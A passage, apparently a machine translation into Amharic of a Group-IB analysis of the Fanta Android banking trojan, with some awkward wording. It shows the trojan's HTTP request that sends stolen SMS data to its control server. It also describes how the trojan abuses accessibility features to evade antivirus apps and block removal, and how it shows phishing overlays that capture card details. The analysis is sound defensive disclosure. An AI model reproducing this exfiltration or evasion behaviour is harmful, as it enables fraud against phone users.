    · ኩኪ - ከአገልጋዩ የተቀበሉ ኩኪዎች
    · ሞድ - ሕብረቁምፊ ቋሚ የገቢ መልዕክት ሳጥን ኤስኤምኤስ ያስቀምጡ
    · ጨረታ - ጥያቄውን ሲልኩ የተቀበለው የተበከለው መሣሪያ መታወቂያ ይመዝገቡ_bot
    · ጽሑፍ - አሁን ባለው የውሂብ ጎታ መዝገብ ውስጥ ጽሑፍ (መስክ d ከጠረጴዛው መዝገቦች በመረጃ ቋቱ ውስጥ а)
    · ቁጥር - የአሁኑ የውሂብ ጎታ መዝገብ ስም (መስክ p ከጠረጴዛው መዝገቦች በመረጃ ቋቱ ውስጥ а)
    · የኤስኤምኤስ_ሞድ - የኢንቲጀር ዋጋ (መስክ m ከጠረጴዛው መዝገቦች በመረጃ ቋቱ ውስጥ а)

    ጥያቄው ይህን ይመስላል።

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    በተሳካ ሁኔታ ወደ አገልጋዩ ከተላከ, ረድፉ ከጠረጴዛው ላይ ይሰረዛል. በአገልጋዩ የተመለሰ የJSON ነገር ምሳሌ፡-

    {
    "response":[],
    "status":"ok"
}

ከተደራሽነት አገልግሎት ጋር መስተጋብር መፍጠር

የተደራሽነት አገልግሎት አንድሮይድ መሳሪያዎችን ለአካል ጉዳተኞች ለመጠቀም ቀላል ለማድረግ ተተግብሯል። በአብዛኛዎቹ ሁኔታዎች ከመተግበሪያ ጋር መስተጋብር ለመፍጠር አካላዊ መስተጋብር ያስፈልጋል። የተደራሽነት አገልግሎት በፕሮግራም እንዲያደርጉ ይፈቅድልዎታል። ፋንታ አገልግሎቱን በባንክ አፕሊኬሽኖች ውስጥ የውሸት መስኮቶችን ለመፍጠር እና ተጠቃሚዎች የሲስተም ሴቲንግ እና አንዳንድ አፕሊኬሽኖችን እንዳይከፍቱ ያደርጋል።

የተደራሽነት አገልግሎትን ተግባር በመጠቀም ትሮጃን በተበከለው መሳሪያ ስክሪን ላይ ወደ ኤለመንቶች ለውጦችን ይቆጣጠራል። ቀደም ሲል እንደተገለፀው የፋንታ ቅንጅቶች በንግግር ሣጥኖች ለመመዝገብ ኃላፊነት ያለው መለኪያ ይይዛሉ - readDialog. ይህ ግቤት ከተዋቀረ ክስተቱን የቀሰቀሰው ጥቅል ስም እና መግለጫ መረጃ ወደ ዳታቤዝ ይታከላል። ክስተቶች ሲቀሰቀሱ ትሮጃን የሚከተሉትን ድርጊቶች ይፈጽማል፡-

  • በሚከተሉት ሁኔታዎች ውስጥ የኋላ እና የቤት ቁልፎችን መጫን ያስመስላል:
    · ተጠቃሚው መሣሪያውን እንደገና ማስጀመር ከፈለገ
    · ተጠቃሚው የ "Avito" መተግበሪያን መሰረዝ ወይም የመዳረሻ መብቶችን መቀየር ከፈለገ
    · በገጹ ላይ የ "Avito" መተግበሪያ መጠቀስ ካለ
    · የGoogle Play ጥበቃ መተግበሪያን ሲከፍቱ
    · በተደራሽነት አገልግሎት ቅንጅቶች ገጾችን ሲከፍቱ
    · የስርዓት ደህንነት የንግግር ሳጥን ሲመጣ
    · ገጹን “በሌላ መተግበሪያ ላይ ይሳሉ” ቅንጅቶች ሲከፍቱ
    · "መተግበሪያዎች" ገጹን ሲከፍቱ "ማገገም እና ዳግም ማስጀመር", "የውሂብ ዳግም ማስጀመር", "ቅንጅቶችን ዳግም አስጀምር", "የገንቢ ፓነል", "ልዩ. እድሎች”፣ “ልዩ ዕድሎች”፣ “ልዩ መብቶች”
    · ክስተቱ በተወሰኑ መተግበሪያዎች የተፈጠረ ከሆነ.

    የመተግበሪያዎች ዝርዝር

    • የ Android
    • ማስተር Lite
    • ንጹህ መምህር
    • ንጹህ ማስተር ለ x86 ሲፒዩ
    • Meizu መተግበሪያ ፈቃድ አስተዳደር
    • MIUI ደህንነት
    • ንጹህ ማስተር - ፀረ-ቫይረስ እና መሸጎጫ እና ቆሻሻ ማጽጃ
    • የወላጅ ቁጥጥሮች እና GPS: Kaspersky SafeKids
    • የ Kaspersky Antivirus AppLock እና የድር ደህንነት ቤታ
    • የቫይረስ ማጽጃ፣ ጸረ-ቫይረስ፣ ማጽጃ (MAX ሴኪዩሪቲ)
    • የሞባይል ጸረ-ቫይረስ ደህንነት PRO
    • አቫስት ጸረ-ቫይረስ እና ነፃ ጥበቃ 2019
    • የሞባይል ደህንነት ሜጋፎን
    • AVG ጥበቃ ለ Xperia
    • የሞባይል ደህንነት
    • ማልዌርባይት ጸረ-ቫይረስ እና ጥበቃ
    • ጸረ-ቫይረስ ለአንድሮይድ 2019
    • የደህንነት ማስተር - ጸረ-ቫይረስ፣ ቪፒኤን፣ አፕሎክ፣ መጨመሪያ
    • AVG ጸረ-ቫይረስ ለHuawei tablet System Manager
    • ሳምሰንግ ተደራሽነት
    • ሳምሰንግ ስማርት አስተዳዳሪ
    • የደህንነት ማስተር
    • የፍጥነት ከፍ ማድረጊያ
    • ዶ / ር ድር
    • የ Dr.Web ደህንነት ቦታ
    • Dr.Web የሞባይል መቆጣጠሪያ ማዕከል
    • Dr.Web Security Space Life
    • Dr.Web የሞባይል መቆጣጠሪያ ማዕከል
    • ጸረ-ቫይረስ እና የሞባይል ደህንነት
    • የ Kaspersky የበይነመረብ ደህንነት: ጸረ-ቫይረስ እና ጥበቃ
    • የ Kaspersky ባትሪ ህይወት፡ ቆጣቢ እና ማበልጸጊያ
    • የ Kaspersky Endpoint Security - ጥበቃ እና አስተዳደር
    • AVG ጸረ-ቫይረስ ነፃ 2019 - ለ Android ጥበቃ
    • ጸረ ቫይረስ Android
    • ኖርተን የሞባይል ደህንነት እና ጸረ-ቫይረስ
    • ጸረ-ቫይረስ፣ ፋየርዎል፣ ቪፒኤን፣ የሞባይል ደህንነት
    • የሞባይል ደህንነት፡ ጸረ-ቫይረስ፣ ቪፒኤን፣ ስርቆት ጥበቃ
    • ጸረ-ቫይረስ ለአንድሮይድ

  • የኤስኤምኤስ መልእክት ወደ አጭር ቁጥር ሲላክ ፈቃድ ከተጠየቀ፣ፋንታ በአመልካች ሳጥኑ ላይ ጠቅ በማድረግ ያስመስላል ምርጫን አስታውስ እና አዝራር ለመላክ.
  • የአስተዳዳሪ መብቶችን ከትሮጃን ለመውሰድ ሲሞክሩ የስልኩን ስክሪን ይቆልፋል።
  • አዳዲስ አስተዳዳሪዎችን ማከል ይከለክላል።
  • የፀረ-ቫይረስ መተግበሪያ ከሆነ dr.web ስጋት እንዳለ ሲያውቅ ፋንታ ቁልፉን ሲጭን አስመስሎታል። ችላ በል.
  • ክስተቱ በመተግበሪያው የመነጨ ከሆነ ትሮጃኑ የኋላ እና የመነሻ ቁልፍን በመጫን ያስመስላል ሳምሰንግ መሣሪያ እንክብካቤ.
  • ፋንታ ወደ 30 የሚጠጉ የተለያዩ የኢንተርኔት አገልግሎቶች ዝርዝር ማመልከቻ ከተጀመረ ሾለ ባንክ ካርዶች መረጃ ለማስገባት ቅጾችን የያዘ የማስገር መስኮቶችን ይፈጥራል። ከነሱ መካከል: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, ወዘተ.

    የማስገር ቅጾች

    Fanta በተበከለው መሣሪያ ላይ የትኞቹ መተግበሪያዎች እየሰሩ እንደሆኑ ይመረምራል። የፍላጎት አፕሊኬሽን ከተከፈተ፣ ትሮጃኑ በሁሉም ላይ የማስገር መስኮት ያሳያል፣ ይህም የባንክ ካርድ መረጃ ለማስገባት ቅጽ ነው። ተጠቃሚው የሚከተለውን ውሂብ ማስገባት አለበት:

    • Омер карты
    • የካርድ ማብቂያ ቀን
    • CVV
    • የካርድ ያዥ ስም (ለሁሉም ባንኮች አይደለም)

    በአሂድ አፕሊኬሽኑ ላይ በመመስረት የተለያዩ የማስገር መስኮቶች ይታያሉ። የአንዳንዶቹ ምሳሌዎች ከዚህ በታች አሉ።

    አሊክስፕረስ

    Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴ
    አቪቶ

    Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴ
    ለአንዳንድ ሌሎች መተግበሪያዎች፣ ለምሳሌ. ጎግል ፕሌይ ገበያ፣ አቪያሳልስ፣ ፓንዳኦ፣ ቦታ ማስያዝ፣ ትሪቫጎ፡
    Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴ

    በእርግጥ እንዴት ነበር

    እንደ እድል ሆኖ, በአንቀጹ መጀመሪያ ላይ የተገለጸውን የኤስኤምኤስ መልእክት የተቀበለ ሰው የሳይበር ደህንነት ባለሙያ ሆኖ ተገኝቷል. ስለዚህ, ትክክለኛው, የዳይሬክተሩ ያልሆነ ስሪት ቀደም ሲል ከተነገረው የተለየ ነው-አንድ ሰው አስደሳች ኤስኤምኤስ ተቀብሏል, ከዚያ በኋላ ለቡድን-IB ስጋት አደን ኢንተለጀንስ ቡድን ሰጠው. የጥቃቱ ውጤት ይህ ጽሑፍ ነው. መልካም መጨረሻ ፣ አይደል? ሆኖም ፣ ሁሉም ታሪኮች በተሳካ ሁኔታ የሚያበቁ አይደሉም ፣ እና የእርስዎ በገንዘብ ኪሳራ የዳይሬክተሩ መቆረጥ እንዳይመስል ፣ በአብዛኛዎቹ ሁኔታዎች የሚከተሉትን ለረጅም ጊዜ የተገለጹ ህጎችን ማክበር በቂ ነው ።

    • አንድሮይድ ኦኤስ ላለው ተንቀሳቃሽ መሳሪያ ከGoogle ፕሌይ ውጪ ከማንኛውም ምንጮች የመጡ መተግበሪያዎችን አይጫኑ
    • ማመልከቻ በሚጭኑበት ጊዜ, በማመልከቻው ለተጠየቁት መብቶች ልዩ ትኩረት ይስጡ
    • የወረዱ ፋይሎችን ማራዘሚያ ትኩረት ይስጡ
    • የአንድሮይድ ኦኤስ ዝመናዎችን በመደበኛነት ይጫኑ
    • አጠራጣሪ ሀብቶችን አይጎበኙ እና ፋይሎችን ከዚያ አያውርዱ
    • በኤስኤምኤስ መልእክት የተቀበሉትን አገናኞች አይጫኑ።

ምንጭ: hab.com

አስተያየት ያክሉ